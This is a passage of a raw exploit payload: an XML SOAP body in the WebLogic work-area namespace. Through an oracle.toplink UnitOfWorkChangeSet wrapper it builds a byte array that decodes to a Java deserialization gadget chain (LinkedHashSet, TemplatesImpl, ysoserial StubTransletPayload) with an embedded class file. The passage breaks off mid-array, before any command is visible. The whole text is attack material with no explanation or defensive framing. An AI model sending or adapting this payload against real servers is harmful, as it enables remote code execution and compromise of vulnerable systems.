xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">  \n<class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>\n<array class=\"byte\" length=\"4346\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>9</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>90</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>21</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>117</byte></void><void index=\"201\"><byte>115</byte></void><void index=\"202\"><byte>101</byte></void><void index=\"203\"><byte>83</byte></void><void index=\"204\"><byte>101</byte></void><void index=\"205\"><byte>114</byte></void><void index=\"206\"><byte>118</byte></void><void index=\"207\"><byte>105</byte></void><void index=\"208\"><byte>99</byte></void><void index=\"209\"><byte>101</byte></void><void index=\"210\"><byte>115</byte></void><void index=\"211\"><byte>77</byte></void><void index=\"212\"><byte>101</byte></void><void index=\"213\"><byte>99</byte></void><void index=\"214\"><byte>104</byte></void><void index=\"215\"><byte>97</byte></void><void index=\"216\"><byte>110</byte></void><void index=\"217\"><byte>105</byte></void><void index=\"218\"><byte>115</byte></void><void index=\"219\"><byte>109</byte></void><void index=\"220\"><byte>76</byte></void><void index=\"221\"><byte>0</byte></void><void index=\"222\"><byte>25</byte></void><void index=\"223\"><byte>95</byte></void><void index=\"224\"><byte>97</byte></void><void index=\"225\"><byte>99</byte></void><void index=\"226\"><byte>99</byte></void><void index=\"227\"><byte>101</byte></void><void index=\"228\"><byte>115</byte></void><void index=\"229\"><byte>115</byte></void><void index=\"230\"><byte>69</byte></void><void index=\"231\"><byte>120</byte></void><void index=\"232\"><byte>116</byte></void><void index=\"233\"><byte>101</byte></void><void index=\"234\"><byte>114</byte></void><void index=\"235\"><byte>110</byte></void><void index=\"236\"><byte>97</byte></void><void index=\"237\"><byte>108</byte></void><void index=\"238\"><byte>83</byte></void><void index=\"239\"><byte>116</byte></void><void index=\"240\"><byte>121</byte></void><void index=\"241\"><byte>108</byte></void><void index=\"242\"><byte>101</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>104</byte></void><void index=\"245\"><byte>101</byte></void><void index=\"246\"><byte>101</byte></void><void index=\"247\"><byte>116</byte></void><void index=\"248\"><byte>116</byte></void><void index=\"249\"><byte>0</byte></void><void index=\"250\"><byte>18</byte></void><void index=\"251\"><byte>76</byte></void><void index=\"252\"><byte>106</byte></void><void index=\"253\"><byte>97</byte></void><void index=\"254\"><byte>118</byte></void><void index=\"255\"><byte>97</byte></void><void index=\"256\"><byte>47</byte></void><void index=\"257\"><byte>108</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>110</byte></void><void index=\"260\"><byte>103</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>83</byte></void><void index=\"263\"><byte>116</byte></void><void index=\"264\"><byte>114</byte></void><void index=\"265\"><byte>105</byte></void><void index=\"266\"><byte>110</byte></void><void index=\"267\"><byte>103</byte></void><void index=\"268\"><byte>59</byte></void><void index=\"269\"><byte>76</byte></void><void index=\"270\"><byte>0</byte></void><void index=\"271\"><byte>11</byte></void><void index=\"272\"><byte>95</byte></void><void index=\"273\"><byte>97</byte></void><void index=\"274\"><byte>117</byte></void><void index=\"275\"><byte>120</byte></void><void index=\"276\"><byte>67</byte></void><void index=\"277\"><byte>108</byte></void><void index=\"278\"><byte>97</byte></void><void index=\"279\"><byte>115</byte></void><void index=\"280\"><byte>115</byte></void><void index=\"281\"><byte>101</byte></void><void index=\"282\"><byte>115</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>0</byte></void><void index=\"285\"><byte>59</byte></void><void index=\"286\"><byte>76</byte></void><void index=\"287\"><byte>99</byte></void><void index=\"288\"><byte>111</byte></void><void index=\"289\"><byte>109</byte></void><void index=\"290\"><byte>47</byte></void><void index=\"291\"><byte>115</byte></void><void index=\"292\"><byte>117</byte></void><void index=\"293\"><byte>110</byte></void><void index=\"294\"><byte>47</byte></void><void index=\"295\"><byte>111</byte></void><void index=\"296\"><byte>114</byte></void><void index=\"297\"><byte>103</byte></void><void index=\"298\"><byte>47</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>112</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>99</byte></void><void index=\"303\"><byte>104</byte></void><void index=\"304\"><byte>101</byte></void><void index=\"305\"><byte>47</byte></void><void index=\"306\"><byte>120</byte></void><void index=\"307\"><byte>97</byte></void><void index=\"308\"><byte>108</byte></void><void index=\"309\"><byte>97</byte></void><void index=\"310\"><byte>110</byte></void><void index=\"311\"><byte>47</byte></void><void index=\"312\"><byte>105</byte></void><void index=\"313\"><byte>110</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>101</byte></void><void index=\"316\"><byte>114</byte></void><void index=\"317\"><byte>110</byte></void><void index=\"318\"><byte>97</byte></void><void index=\"319\"><byte>108</byte></void><void index=\"320\"><byte>47</byte></void><void index=\"321\"><byte>120</byte></void><void index=\"322\"><byte>115</byte></void><void index=\"323\"><byte>108</byte></void><void index=\"324\"><byte>116</byte></void><void index=\"325\"><byte>99</byte></void><void index=\"326\"><byte>47</byte></void><void index=\"327\"><byte>114</byte></void><void index=\"328\"><byte>117</byte></void><void index=\"329\"><byte>110</byte></void><void index=\"330\"><byte>116</byte></void><void index=\"331\"><byte>105</byte></void><void index=\"332\"><byte>109</byte></void><void index=\"333\"><byte>101</byte></void><void index=\"334\"><byte>47</byte></void><void index=\"335\"><byte>72</byte></void><void index=\"336\"><byte>97</byte></void><void index=\"337\"><byte>115</byte></void><void index=\"338\"><byte>104</byte></void><void index=\"339\"><byte>116</byte></void><void index=\"340\"><byte>97</byte></void><void index=\"341\"><byte>98</byte></void><void index=\"342\"><byte>108</byte></void><void index=\"343\"><byte>101</byte></void><void index=\"344\"><byte>59</byte></void><void index=\"345\"><byte>91</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>10</byte></void><void index=\"348\"><byte>95</byte></void><void index=\"349\"><byte>98</byte></void><void index=\"350\"><byte>121</byte></void><void index=\"351\"><byte>116</byte></void><void index=\"352\"><byte>101</byte></void><void index=\"353\"><byte>99</byte></void><void index=\"354\"><byte>111</byte></void><void index=\"355\"><byte>100</byte></void><void index=\"356\"><byte>101</byte></void><void index=\"357\"><byte>115</byte></void><void index=\"358\"><byte>116</byte></void><void index=\"359\"><byte>0</byte></void><void index=\"360\"><byte>3</byte></void><void index=\"361\"><byte>91</byte></void><void index=\"362\"><byte>91</byte></void><void index=\"363\"><byte>66</byte></void><void index=\"364\"><byte>91</byte></void><void index=\"365\"><byte>0</byte></void><void index=\"366\"><byte>6</byte></void><void index=\"367\"><byte>95</byte></void><void index=\"368\"><byte>99</byte></void><void index=\"369\"><byte>108</byte></void><void index=\"370\"><byte>97</byte></void><void index=\"371\"><byte>115</byte></void><void index=\"372\"><byte>115</byte></void><void index=\"373\"><byte>116</byte></void><void index=\"374\"><byte>0</byte></void><void index=\"375\"><byte>18</byte></void><void index=\"376\"><byte>91</byte></void><void index=\"377\"><byte>76</byte></void><void index=\"378\"><byte>106</byte></void><void index=\"379\"><byte>97</byte></void><void index=\"380\"><byte>118</byte></void><void index=\"381\"><byte>97</byte></void><void index=\"382\"><byte>47</byte></void><void index=\"383\"><byte>108</byte></void><void index=\"384\"><byte>97</byte></void><void index=\"385\"><byte>110</byte></void><void index=\"386\"><byte>103</byte></void><void index=\"387\"><byte>47</byte></void><void index=\"388\"><byte>67</byte></void><void index=\"389\"><byte>108</byte></void><void index=\"390\"><byte>97</byte></void><void index=\"391\"><byte>115</byte></void><void index=\"392\"><byte>115</byte></void><void index=\"393\"><byte>59</byte></void><void index=\"394\"><byte>76</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>5</byte></void><void index=\"397\"><byte>95</byte></void><void index=\"398\"><byte>110</byte></void><void index=\"399\"><byte>97</byte></void><void index=\"400\"><byte>109</byte></void><void index=\"401\"><byte>101</byte></void><void index=\"402\"><byte>113</byte></void><void index=\"403\"><byte>0</byte></void><void index=\"404\"><byte>126</byte></void><void index=\"405\"><byte>0</byte></void><void index=\"406\"><byte>4</byte></void><void index=\"407\"><byte>76</byte></void><void index=\"408\"><byte>0</byte></void><void index=\"409\"><byte>17</byte></void><void index=\"410\"><byte>95</byte></void><void index=\"411\"><byte>111</byte></void><void index=\"412\"><byte>117</byte></void><void index=\"413\"><byte>116</byte></void><void index=\"414\"><byte>112</byte></void><void index=\"415\"><byte>117</byte></void><void index=\"416\"><byte>116</byte></void><void index=\"417\"><byte>80</byte></void><void index=\"418\"><byte>114</byte></void><void index=\"419\"><byte>111</byte></void><void index=\"420\"><byte>112</byte></void><void index=\"421\"><byte>101</byte></void><void index=\"422\"><byte>114</byte></void><void index=\"423\"><byte>116</byte></void><void index=\"424\"><byte>105</byte></void><void index=\"425\"><byte>101</byte></void><void index=\"426\"><byte>115</byte></void><void index=\"427\"><byte>116</byte></void><void index=\"428\"><byte>0</byte></void><void index=\"429\"><byte>22</byte></void><void index=\"430\"><byte>76</byte></void><void index=\"431\"><byte>106</byte></void><void index=\"432\"><byte>97</byte></void><void index=\"433\"><byte>118</byte></void><void index=\"434\"><byte>97</byte></void><void index=\"435\"><byte>47</byte></void><void index=\"436\"><byte>117</byte></void><void index=\"437\"><byte>116</byte></void><void index=\"438\"><byte>105</byte></void><void index=\"439\"><byte>108</byte></void><void index=\"440\"><byte>47</byte></void><void index=\"441\"><byte>80</byte></void><void index=\"442\"><byte>114</byte></void><void index=\"443\"><byte>111</byte></void><void index=\"444\"><byte>112</byte></void><void index=\"445\"><byte>101</byte></void><void index=\"446\"><byte>114</byte></void><void index=\"447\"><byte>116</byte></void><void index=\"448\"><byte>105</byte></void><void index=\"449\"><byte>101</byte></void><void index=\"450\"><byte>115</byte></void><void index=\"451\"><byte>59</byte></void><void index=\"452\"><byte>120</byte></void><void index=\"453\"><byte>112</byte></void><void index=\"454\"><byte>0</byte></void><void index=\"455\"><byte>0</byte></void><void index=\"456\"><byte>0</byte></void><void index=\"457\"><byte>0</byte></void><void index=\"458\"><byte>-1</byte></void><void index=\"459\"><byte>-1</byte></void><void index=\"460\"><byte>-1</byte></void><void index=\"461\"><byte>-1</byte></void><void index=\"462\"><byte>0</byte></void><void index=\"463\"><byte>116</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>3</byte></void><void index=\"466\"><byte>97</byte></void><void index=\"467\"><byte>108</byte></void><void index=\"468\"><byte>108</byte></void><void index=\"469\"><byte>112</byte></void><void index=\"470\"><byte>117</byte></void><void index=\"471\"><byte>114</byte></void><void index=\"472\"><byte>0</byte></void><void index=\"473\"><byte>3</byte></void><void index=\"474\"><byte>91</byte></void><void index=\"475\"><byte>91</byte></void><void index=\"476\"><byte>66</byte></void><void index=\"477\"><byte>75</byte></void><void index=\"478\"><byte>-3</byte></void><void index=\"479\"><byte>25</byte></void><void index=\"480\"><byte>21</byte></void><void index=\"481\"><byte>103</byte></void><void index=\"482\"><byte>103</byte></void><void index=\"483\"><byte>-37</byte></void><void index=\"484\"><byte>55</byte></void><void index=\"485\"><byte>2</byte></void><void index=\"486\"><byte>0</byte></void><void index=\"487\"><byte>0</byte></void><void index=\"488\"><byte>120</byte></void><void index=\"489\"><byte>112</byte></void><void index=\"490\"><byte>0</byte></void><void index=\"491\"><byte>0</byte></void><void index=\"492\"><byte>0</byte></void><void index=\"493\"><byte>2</byte></void><void index=\"494\"><byte>117</byte></void><void index=\"495\"><byte>114</byte></void><void index=\"496\"><byte>0</byte></void><void index=\"497\"><byte>2</byte></void><void index=\"498\"><byte>91</byte></void><void index=\"499\"><byte>66</byte></void><void index=\"500\"><byte>-84</byte></void><void index=\"501\"><byte>-13</byte></void><void index=\"502\"><byte>23</byte></void><void index=\"503\"><byte>-8</byte></void><void index=\"504\"><byte>6</byte></void><void index=\"505\"><byte>8</byte></void><void index=\"506\"><byte>84</byte></void><void index=\"507\"><byte>-32</byte></void><void index=\"508\"><byte>2</byte></void><void index=\"509\"><byte>0</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>120</byte></void><void index=\"512\"><byte>112</byte></void><void index=\"513\"><byte>0</byte></void><void index=\"514\"><byte>0</byte></void><void index=\"515\"><byte>11</byte></void><void index=\"516\"><byte>-123</byte></void><void index=\"517\"><byte>-54</byte></void><void index=\"518\"><byte>-2</byte></void><void index=\"519\"><byte>-70</byte></void><void index=\"520\"><byte>-66</byte></void><void index=\"521\"><byte>0</byte></void><void index=\"522\"><byte>0</byte></void><void index=\"523\"><byte>0</byte></void><void index=\"524\"><byte>50</byte></void><void index=\"525\"><byte>0</byte></void><void index=\"526\"><byte>81</byte></void><void index=\"527\"><byte>10</byte></void><void index=\"528\"><byte>0</byte></void><void index=\"529\"><byte>3</byte></void><void index=\"530\"><byte>0</byte></void><void index=\"531\"><byte>34</byte></void><void index=\"532\"><byte>7</byte></void><void index=\"533\"><byte>0</byte></void><void index=\"534\"><byte>79</byte></void><void index=\"535\"><byte>7</byte></void><void index=\"536\"><byte>0</byte></void><void index=\"537\"><byte>37</byte></void><void index=\"538\"><byte>7</byte></void><void index=\"539\"><byte>0</byte></void><void index=\"540\"><byte>38</byte></void><void index=\"541\"><byte>1</byte></void><void index=\"542\"><byte>0</byte></void><void index=\"543\"><byte>16</byte></void><void index=\"544\"><byte>115</byte></void><void index=\"545\"><byte>101</byte></void><void index=\"546\"><byte>114</byte></void><void index=\"547\"><byte>105</byte></void><void index=\"548\"><byte>97</byte></void><void index=\"549\"><byte>108</byte></void><void index=\"550\"><byte>86</byte></void><void index=\"551\"><byte>101</byte></void><void index=\"552\"><byte>114</byte></void><void index=\"553\"><byte>115</byte></void><void index=\"554\"><byte>105</byte></void><void index=\"555\"><byte>111</byte></void><void index=\"556\"><byte>110</byte></void><void index=\"557\"><byte>85</byte></void><void index=\"558\"><byte>73</byte></void><void index=\"559\"><byte>68</byte></void><void index=\"560\"><byte>1</byte></void><void index=\"561\"><byte>0</byte></void><void index=\"562\"><byte>1</byte></void><void index=\"563\"><byte>74</byte></void><void index=\"564\"><byte>1</byte></void><void index=\"565\"><byte>0</byte></void><void index=\"566\"><byte>13</byte></void><void index=\"567\"><byte>67</byte></void><void index=\"568\"><byte>111</byte></void><void index=\"569\"><byte>110</byte></void><void index=\"570\"><byte>115</byte></void><void index=\"571\"><byte>116</byte></void><void index=\"572\"><byte>97</byte></void><void index=\"573\"><byte>110</byte></void><void index=\"574\"><byte>116</byte></void><void index=\"575\"><byte>86</byte></void><void index=\"576\"><byte>97</byte></void><void index=\"577\"><byte>108</byte></void><void index=\"578\"><byte>117</byte></void><void index=\"579\"><byte>101</byte></void><void index=\"580\"><byte>5</byte></void><void index=\"581\"><byte>-83</byte></void><void index=\"582\"><byte>32</byte></void><void index=\"583\"><byte>-109</byte></void><void index=\"584\"><byte>-13</byte></void><void index=\"585\"><byte>-111</byte></void><void index=\"586\"><byte>-35</byte></void><void index=\"587\"><byte>-17</byte></void><void index=\"588\"><byte>62</byte></void><void index=\"589\"><byte>1</byte></void><void index=\"590\"><byte>0</byte></void><void index=\"591\"><byte>6</byte></void><void index=\"592\"><byte>60</byte></void><void index=\"593\"><byte>105</byte></void><void index=\"594\"><byte>110</byte></void><void index=\"595\"><byte>105</byte></void><void index=\"596\"><byte>116</byte></void><void index=\"597\"><byte>62</byte></void><void index=\"598\"><byte>1</byte></void><void index=\"599\"><byte>0</byte></void><void index=\"600\"><byte>3</byte></void><void index=\"601\"><byte>40</byte></void><void index=\"602\"><byte>41</byte></void><void index=\"603\"><byte>86</byte></void><void index=\"604\"><byte>1</byte></void><void index=\"605\"><byte>0</byte></void><void index=\"606\"><byte>4</byte></void><void index=\"607\"><byte>67</byte></void><void index=\"608\"><byte>111</byte></void><void index=\"609\"><byte>100</byte></void><void index=\"610\"><byte>101</byte></void><void index=\"611\"><byte>1</byte></void><void index=\"612\"><byte>0</byte></void><void index=\"613\"><byte>15</byte></void><void index=\"614\"><byte>76</byte></void><void index=\"615\"><byte>105</byte></void><void index=\"616\"><byte>110</byte></void><void index=\"617\"><byte>101</byte></void><void index=\"618\"><byte>78</byte></void><void index=\"619\"><byte>117</byte></void><void index=\"620\"><byte>109</byte></void><void index=\"621\"><byte>98</byte></void><void index=\"622\"><byte>101</byte></void><void index=\"623\"><byte>114</byte></void><void index=\"624\"><byte>84</byte></void><void index=\"625\"><byte>97</byte></void><void index=\"626\"><byte>98</byte></void><void index=\"627\"><byte>108</byte></void><void index=\"628\"><byte>101</byte></void><void index=\"629\"><byte>1</byte></void><void index=\"630\"><byte>0</byte></void><void index=\"631\"><byte>18</byte></void><void index=\"632\"><byte>76</byte></void><void index=\"633\"><byte>111</byte></void><void index=\"634\"><byte>99</byte></void><void index=\"635\"><byte>97</byte></void><void index=\"636\"><byte>108</byte></void><void index=\"637\"><byte>86</byte></void><void index=\"638\"><byte>97</byte></void><void index=\"639\"><byte>114</byte></void><void index=\"640\"><byte>105</byte></void><void index=\"641\"><byte>97</byte></void><void index=\"642\"><byte>98</byte></void><void index=\"643\"><byte>108</byte></void><void index=\"644\"><byte>101</byte></void><void index=\"645\"><byte>84</byte></void><void index=\"646\"><byte>97</byte></void><void index=\"647\"><byte>98</byte></void><void index=\"648\"><byte>108</byte></void><void index=\"649\"><byte>101</byte></void><void index=\"650\"><byte>1</byte></void><void index=\"651\"><byte>0</byte></void><void index=\"652\"><byte>4</byte></void><void index=\"653\"><byte>116</byte></void><void index=\"654\"><byte>104</byte></void><void index=\"655\"><byte>105</byte></void><void index=\"656\"><byte>115</byte></void><void index=\"657\"><byte>1</byte></void><void index=\"658\"><byte>0</byte></void><void index=\"659\"><byte>19</byte></void><void index=\"660\"><byte>83</byte></void><void index=\"661\"><byte>116</byte></void><void index=\"662\"><byte>117</byte></void><void index=\"663\"><byte>98</byte></void><void index=\"664\"><byte>84</byte></void><void index=\"665\"><byte>114</byte></void><void index=\"666\"><byte>97</byte></void><void index=\"667\"><byte>110</byte></void><void index=\"668\"><byte>115</byte></void><void index=\"669\"><byte>108</byte></void><void index=\"670\"><byte>101</byte></void><void index=\"671\"><byte>116</byte></void><void index=\"672\"><byte>80</byte></void><void index=\"673\"><byte>97</byte></void><void index=\"674\"><byte>121</byte></void><void index=\"675\"><byte>108</byte></void><void index=\"676\"><byte>111</byte></void><void index=\"677\"><byte>97</byte></void><void index=\"678\"><byte>100</byte></void><void index=\"679\"><byte>1</byte></void><void index=\"680\"><byte>0</byte></void><void index=\"681\"><byte>12</byte></void><void index=\"682\"><byte>73</byte></void><void index=\"683\"><byte>110</byte></void><void index=\"684\"><byte>110</byte></void><void index=\"685\"><byte>101</byte></void><void index=\"686\"><byte>114</byte></void><void index=\"687\"><byte>67</byte></void><void index=\"688\"><byte>108</byte></void><void index=\"689\"><byte>97</byte></void><void index=\"690\"><byte>115</byte></void><void index=\"691\"><byte>115</byte></void><void index=\"692\"><byte>101</byte></void><void index=\"693\"><byte>115</byte></void><void index=\"694\"><byte>1</byte></void><void index=\"695\"><byte>0</byte></void><void index=\"696\"><byte>53</byte></void><void index=\"697\"><byte>76</byte></void><void index=\"698\"><byte>121</byte></void><void index=\"699\"><byte>115</byte></void><void index=\"700\"><byte>111</byte></void><void index=\"701\"><byte>115</byte></void><void index=\"702\"><byte>101</byte></void><void index=\"703\"><byte>114</byte></void><void index=\"704\"><byte>105</byte></void><void index=\"705\"><byte>97</byte></void><void index=\"706\"><byte>108</byte></void><void index=\"707\"><byte>47</byte></void><void index=\"708\"><byte>112</byte></void><void index=\"709\"><byte>97</byte></void><void index=\"710\"><byte>121</byte></void><void index=\"711\"><byte>108</byte></void><void index=\"712\"><byte>111</byte></void><void index=\"713\"><byte>97</byte></void><void index=\"714\"><byte>100</byte></void><void index=\"715\"><byte>115</byte></void><void index=\"716\"><byte>47</byte></void><void index=\"717\"><byte>117</byte></void><void index=\"718\"><byte>116</byte></void><void index=\"719\"><byte>105</byte></void><void index=\"720\"><byte>108</byte></void><void index=\"721\"><byte>47</byte></void><void index=\"722\"><byte>71</byte></void><void index=\"723\"><byte>97</byte></void><void index=\"724\"><byte>100</byte></void><void index=\"725\"><byte>103</byte></void><void index=\"726\"><byte>101</byte></void><void index=\"727\"><byte>116</byte></void><void index=\"728\"><byte>115</byte></void><void index=\"729\"><byte>36</byte></void><void index=\"730\"><byte>83</byte></void><void index=\"731\"><byte>116</byte></void><void index=\"732\"><byte>117</byte></void><void index=\"733\"><byte>98</byte></void><void index=\"734\"><byte>84</byte></void><void index=\"735\"><byte>114</byte></void><void index=\"736\"><byte>97</byte></void><void index=\"737\"><byte>110</byte></void><void index=\"738\"><byte>115</byte></void><void index=\"739\"><byte>108</byte></void><void index=\"740\"><byte>101</byte></void><void index=\"741\"><byte>116</byte></void><void index=\"742\"><byte>80</byte></void><void index=\"743\"><byte>97</byte></void><void index=\"744\"><byte>121</byte></void><void index=\"745\"><byte>108</byte></void><void index=\"746\"><byte>111</byte></void><void index=\"747\"><byte>97</byte></void><void index=\"748\"><byte>100</byte></void><void index=\"749\"><byte>59</byte></void><void index=\"750\"><byte>1</byte></void><void index=\"751\"><byte>0</byte></void><void index=\"752\"><byte>9</byte></void><void index=\"753\"><byte>116</byte></void><void index=\"754\"><byte>114</byte></void><void index=\"755\"><byte>97</byte></void><void index=\"756\"><byte>110</byte></void><void index=\"757\"><byte>115</byte></void><void index=\"758\"><byte>102</byte></void><void index=\"759\"><byte>111</byte></void><void index=\"760\"><byte>114</byte></void><void index=\"761\"><byte>109</byte></void><void index=\"762\"><byte>1</byte></void><void index=\"763\"><byte>0</byte></void><void index=\"764\"><byte>114</byte></void><void index=\"765\"><byte>40</byte></void><void index=\"766\"><byte>76</byte></void><void index=\"767\"><byte>99</byte></void><void index=\"768\"><byte>111</byte></void><void index=\"769\"><byte>109</byte></void><void index=\"770\"><byte>47</byte></void><void index=\"771\"><byte>115</byte></void><void index=\"772\"><byte>117</byte></void><void index=\"773\"><byte>110</byte></void><void index=\"774\"><byte>47</byte></void><void index=\"775\"><byte>111</byte></void><void index=\"776\"><byte>114</byte></void><void index=\"777\"><byte>103</byte></void><void index=\"778\"><byte>47</byte></void><void index=\"779\"><byte>97</byte></void><void index=\"780\"><byte>112</byte></void><void index=\"781\"><byte>97</byte></void><void 